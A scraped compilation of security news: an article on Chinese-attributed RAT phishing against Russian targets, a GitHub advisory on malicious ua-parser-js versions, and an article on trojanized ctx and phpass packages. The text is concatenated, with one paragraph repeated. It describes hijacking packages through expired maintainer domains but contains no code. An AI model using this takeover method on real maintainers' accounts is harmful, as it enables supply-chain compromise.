"The campaigns \[...\] are designed to implant a Remote Access Trojan (RAT) that can be used to surveil the computers it infects, and run commands on them remotely," Malwarebytes said in a technical report published Tuesday.

The cybersecurity company attributed the attacks with low confidence to a Chinese hacking group, citing infrastructure overlaps between the RAT and Sakula Rat malware used by a threat actor known as Deep Panda.

The attack chains, while leveraging different lures over the course of two months, all employed the same malware barring small differences in the source code.

The campaign is said to have commenced around February 26, days after Russia's military invasion of Ukraine, with the emails distributing the RAT under the guise of an interactive map of Ukraine ("interactive\_map\_UA.exe").

The development once again demonstrates threat actors' capabilities to adapt and adjust their attacks to world events, using the most relevant and up-to-date lures to maximize their chances of success.

A second early March attack wave primarily targeted the state-controlled RT TV and involved the use of a rogue software fix for the Log4Shell vulnerability that made headlines in late 2021.

Besides including the patch in the form of a compressed TAR file, the email message also came with a PDF document with instructions to install the patch and listed the best security practices to follow, including enabling two-factor authentication, using Kaspersky antivirus, and refraining from opening or replying to suspicious emails.

In a further attempt to boost the authenticity of the email, the document also contained a VirusTotal URL pointing to an unrelated file to give the impression that the Log4j patch file is not malicious.

What's more, the email featured links to an attacker-controlled domain "rostec\[.\]digital" along with fraudulent profiles created on Facebook and Instagram alluding to the Russian defense conglomerate.

"Interestingly, the threat actor created the Facebook page in June 2021, nine months before it was used in this campaign," the researchers said. "This was probably an attempt to attract followers, to make the page look more legitimate, and it suggests the APT group were planning this campaign long before the invasion of Ukraine."

The third iteration of the attack that followed made use of another malicious executable file — this time "build\_rosteh4.exe" — in an attempt to pass off the malware as though it's from Rostec.

Lastly, in mid-April 2022, the attackers pivoted to a job-themed phishing bait for Saudi Aramco, a Saudi Arabian petroleum and natural gas company, the weaponized Microsoft Word document acting as a trigger for an infection sequence to deploy the RAT.

The DLL payload employs a variety of advanced tricks to thwart analysis, including control flow flattening and string obfuscation, while also incorporating features that allow it to arbitrary files sent from a remote server to the infected host and execute command-line instructions.

The findings closely follow findings from Check Point that a Chinese adversarial collective with connections to Stone Panda and Mustang Panda targeted at least two research institutes located in Russia with a previously undocumented backdoor called Spinner.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Find New Malware Attacks Targeting Russian Government Entities

A vulnerability was found in ua-parser-js 0.7.29/0.8.0/1.0.0. It has been rated as critical. This issue affects the crypto mining component which introduces a backdoor. Upgrading to version 0.7.30, 0.8.1 and 1.0.1 is able to address this issue. It is recommended to upgrade the affected component.

The npm package ua-parser-js had three versions published with malicious code. Users of affected versions (0.7.29, 0.8.0, 1.0.0) should upgrade as soon as possible and check their systems for suspicious activity. See this issue for details as they unfold.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

**References**

*   faisalman/ua-parser-js#536
*   https://www.npmjs.com/package/ua-parser-js
*   faisalman/ua-parser-js#536 (comment)

CVE-2021-4229: GHSA-pjwm-rvh2-c87w - GitHub Advisory Database

Two trojanized Python and PHP packages have been uncovered in what's yet another instance of a software supply chain attack targeting the open source ecosystem.
One of the packages in question is "ctx," a Python module available in the PyPi repository. The other involves "phpass," a PHP package that's been forked on GitHub to distribute a rogue update.
"In both cases the attacker appears to have

Two trojanized Python and PHP packages have been uncovered in what's yet another instance of a software supply chain attack targeting the open source ecosystem.

One of the packages in question is "ctx," a Python module available in the PyPi repository. The other involves "phpass," a PHP package that's been forked on GitHub to distribute a rogue update.

"In both cases the attacker appears to have taken over packages that have not been updated in a while," the SANS Internet Storm Center (ISC) said, one of whose volunteer incident handlers, Yee Ching, analyzed the ctx package.

It's worth noting that ctx was last published to PyPi on December 19, 2014. On the other hand, phpass hasn't received an update since it was uploaded to Packagist on August 31, 2012.

The malicious Python package, which was pushed to PyPi on May 21, 2022, has been removed from the repository, but the PHP library still continues to be available on GitHub.

In both instances, the modifications are designed to exfiltrate AWS credentials to a Heroku URL named 'anti-theft-web.herokuapp\[.\]com.' "It appears that the perpetrator is trying to obtain all the environment variables, encode them in Base64, and forward the data to a web app under the perpetrator's control," Ching said.

It's suspected that the attacker managed to gain unauthorized access to the maintainer's account to publish the new ctx version. Further investigation has revealed that the threat actor registered the expired domain used by the original maintainer on May 14, 2022.

Linux diff command executed on original ctx 0.1.2 Package and the "new" ctx 0.1.2 Package

"With control over the original domain name, creating a corresponding email to receive a password reset email would be trivial," Ching added. "After gaining access to the account, the perpetrator could remove the old package and upload the new backdoored versions."

Coincidentally, on May 10, 2022, security consultant Lance Vick disclosed how it's possible to purchase lapsed NPM maintainer email domains and subsequently use them to re-create maintainer emails and seize control of the packages.

What's more, a metadata analysis of 1.63 million JavaScript NPM packages conducted by academics from Microsoft and North Carolina State University last year uncovered 2,818 maintainer email addresses associated with expired domains, effectively allowing an attacker to hijack 8,494 packages by taking over the NPM accounts.

"In general, any domain name can be purchased from a domain registrar allowing the purchaser to connect to an email hosting service to get a personal email address," the researchers said. "An attacker can hijack a user's domain to take over an account associated with that email address."

Should the domain of a maintainer turn out to be expired, the threat actor can acquire the domain and alter the DNS mail exchange (MX) records to appropriate the maintainer's email address.

"Looks like the phpass compromise happened because the owner of the package source - 'hautelook' deleted his account and then the attacker claimed the username," researcher Somdev Sangwan said in a series of tweets, detailing what's called a repository hijacking attack.

Public repositories of open source code such as Maven, NPM, Packages, PyPi, and RubyGems are a critical part of the software supply chain that many organizations rely on to develop applications.

On the flip side, this has also made them an attractive target for a variety of adversaries seeking to deliver malware.

This includes typosquatting, dependency confusion, and account takeover attacks, the latter of which could be leveraged to ship fraudulent versions of legitimate packages, leading to widespread supply chain compromises.

"Developers are blindly trusting repositories and installing packages from these sources, assuming they are secure," DevSecOps firm JFrog said last year, adding how threat actors are using the repositories as a malware distribution vector and launch successful attacks on both developer and CI/CD machines in the pipeline.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#backdoor